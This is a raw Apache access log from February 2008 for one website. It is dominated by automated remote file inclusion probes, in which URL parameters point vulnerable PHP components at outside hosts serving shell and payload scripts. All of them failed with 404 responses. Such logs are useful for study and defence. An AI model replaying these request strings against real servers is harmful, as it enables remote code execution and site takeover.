64.13.222.135 - - [17/Feb/2008:10:17:17 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.80.93.168 - - [17/Feb/2008:10:17:19 -0800] "GET /logs/access_080201.log/modules.php?name=TotalCalendar&file=index&inc_dir=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [17/Feb/2008:10:17:20 -0800] "GET /modules.php?name=TotalCalendar&file=index&inc_dir=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [17/Feb/2008:10:17:20 -0800] "GET /logs/modules.php?name=TotalCalendar&file=index&inc_dir=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.38.51.226 - - [17/Feb/2008:10:18:19 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
64.38.51.226 - - [17/Feb/2008:10:18:19 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
82.159.204.29 - - [17/Feb/2008:10:18:20 -0800] "GET /logs/access_071230.log/index.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:10:19:18 -0800] "GET /contact.php?admin.php?include_path=http://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:10:19:19 -0800] "GET /logs/contact.php?admin.php?include_path=http://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
208.80.72.89 - - [17/Feb/2008:10:19:34 -0800] "GET /logs/access_071225.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.17.35.69 - - [17/Feb/2008:10:19:41 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.aquamantri.com/Mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.17.35.69 - - [17/Feb/2008:10:19:41 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.aquamantri.com/Mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.146.116.150 - - [17/Feb/2008:10:19:44 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.116.150 - - [17/Feb/2008:10:19:44 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.116.150 - - [17/Feb/2008:10:19:45 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.255.32.189 - - [17/Feb/2008:10:20:29 -0800] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.189 - - [17/Feb/2008:10:20:30 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.189 - - [17/Feb/2008:10:20:30 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.38.51.226 - - [17/Feb/2008:10:20:50 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
64.38.51.226 - - [17/Feb/2008:10:20:52 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
211.255.32.189 - - [17/Feb/2008:10:20:54 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.22.103 - - [17/Feb/2008:10:21:14 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.103 - - [17/Feb/2008:10:21:15 -0800] "GET /tmp/sess_504494bcb62172c1f98d63f18ce04732 HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.120.148.82 - - [17/Feb/2008:10:21:17 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dagenk.tripod.com/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.0.28 - - [17/Feb/2008:10:22:26 -0800] "GET /index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://cosmosindoabadi.co.id//test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
200.29.0.28 - - [17/Feb/2008:10:22:26 -0800] "GET /logs/index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://cosmosindoabadi.co.id//test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
69.72.144.18 - - [17/Feb/2008:10:22:59 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.144.18 - - [17/Feb/2008:10:22:59 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.144.18 - - [17/Feb/2008:10:23:00 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.80.93.168 - - [17/Feb/2008:10:23:06 -0800] "GET /logs/access_080123.log/modules.php?name=TotalCalendar&file=index&inc_dir=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
207.58.164.77 - - [17/Feb/2008:10:23:32 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
207.58.164.77 - - [17/Feb/2008:10:23:32 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
84.234.71.230 - - [17/Feb/2008:10:23:37 -0800] "GET /test.php?page=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.40.23.83 - - [17/Feb/2008:10:26:03 -0800] "GET /logs/access_080123.log///modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/putr4/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [17/Feb/2008:10:26:03 -0800] "GET ///modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/putr4/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [17/Feb/2008:10:26:04 -0800] "GET /logs///modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/putr4/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.149.238.27 - - [17/Feb/2008:10:26:09 -0800] "GET /test.php?page=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:10:26:33 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:10:26:34 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:10:26:35 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:10:26:44 -0800] "GET /about.php?admin.php?include_path=http://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:10:26:44 -0800] "GET /logs/about.php?admin.php?include_path=http://branigan.net/mmb/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:10:26:59 -0800] "GET /logs/access_071225.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:10:27:00 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:10:27:00 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:10:27:03 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:10:27:03 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:10:27:03 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:10:27:03 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:10:27:09 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:10:27:09 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:10:27:10 -0800] "GET /logs/access_071225.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:10:27:10 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:10:27:11 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:10:27:47 -0800] "GET /logs/access_071225.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:10:27:47 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.78.228.150 - - [17/Feb/2008:10:27:48 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
82.146.116.150 - - [17/Feb/2008:10:30:03 -0800] "GET /logs/access_071225.log/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.116.150 - - [17/Feb/2008:10:30:03 -0800] "GET /com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.116.150 - - [17/Feb/2008:10:30:04 -0800] "GET /logs/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.157.58.25 - - [17/Feb/2008:10:30:05 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://safebx.my-webs.org/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
207.157.58.25 - - [17/Feb/2008:10:30:11 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://safebx.my-webs.org/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
208.104.248.62 - - [17/Feb/2008:10:32:04 -0800] "GET /logs/access_080108.log/config.inc.php?path_escape=http://www.loveingod.org/bbs/icon/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
208.104.248.62 - - [17/Feb/2008:10:32:04 -0800] "GET /logs/config.inc.php?path_escape=http://www.loveingod.org/bbs/icon/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.118.104.114 - - [17/Feb/2008:10:33:10 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://webcal.promocall.de//tools/pr.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
87.118.104.114 - - [17/Feb/2008:10:33:10 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://webcal.promocall.de//tools/pr.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
64.38.51.226 - - [17/Feb/2008:10:33:12 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
64.38.51.226 - - [17/Feb/2008:10:33:13 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:10:33:39 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:10:33:39 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:10:33:40 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.237.162 - - [17/Feb/2008:10:35:01 -0800] "GET /logs/access_080108.log/xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.237.162 - - [17/Feb/2008:10:35:01 -0800] "GET /xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.237.162 - - [17/Feb/2008:10:35:02 -0800] "GET /logs/xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.19.186.99 - - [17/Feb/2008:10:35:40 -0800] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.186.99 - - [17/Feb/2008:10:35:40 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.186.99 - - [17/Feb/2008:10:35:40 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.121.1.47 - - [17/Feb/2008:10:35:59 -0800] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://menlowstation.net/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [17/Feb/2008:10:36:40 -0800] "GET /logs/access_080108.log/xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [17/Feb/2008:10:36:40 -0800] "GET /xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [17/Feb/2008:10:36:40 -0800] "GET /logs/xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.50.26 - - [17/Feb/2008:10:37:01 -0800] "GET /logs/access_080120.log/index.php?sourcedir=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.25.213.172 - - [17/Feb/2008:10:37:22 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.25.213.172 - - [17/Feb/2008:10:37:23 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.40.23.83 - - [17/Feb/2008:10:37:31 -0800] "GET /logs/access_080126.log///modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/putr4/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:10:37:34 -0800] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.yildizdogan.org/modules/Forums/admin/Mambo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:10:37:34 -0800] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.yildizdogan.org/modules/Forums/admin/Mambo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
74.6.20.143 - - [17/Feb/2008:10:38:11 -0800] "GET /funny/?S=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.193.222.218 - - [17/Feb/2008:10:38:11 -0800] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.beautybylaura.co.uk/zencart/includes/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
213.193.222.218 - - [17/Feb/2008:10:38:11 -0800] "GET /logs/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.beautybylaura.co.uk/zencart/includes/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:10:38:28 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:10:38:28 -0800] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:10:38:28 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.229.60.4 - - [17/Feb/2008:10:38:35 -0800] "GET //mcf.php?content=http://www.microtrack.co.kr/bbs/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.34 - - [17/Feb/2008:10:38:54 -0800] "GET /logs/access_071204.log HTTP/1.0" 200 9222 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:10:38:55 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:10:38:55 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:10:38:55 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.172 - - [17/Feb/2008:10:38:56 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.172 - - [17/Feb/2008:10:38:57 -0800] "GET /mobileoffice/?N=D HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:10:39:05 -0800] "GET /logs/access_080131.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:10:39:05 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:10:39:06 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [17/Feb/2008:10:39:14 -0800] "GET /logs/access_080126.log//modules/xfsection/modify.php?dir_module=http://www.7s-softball.com/modules/tinycontent/content/load.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
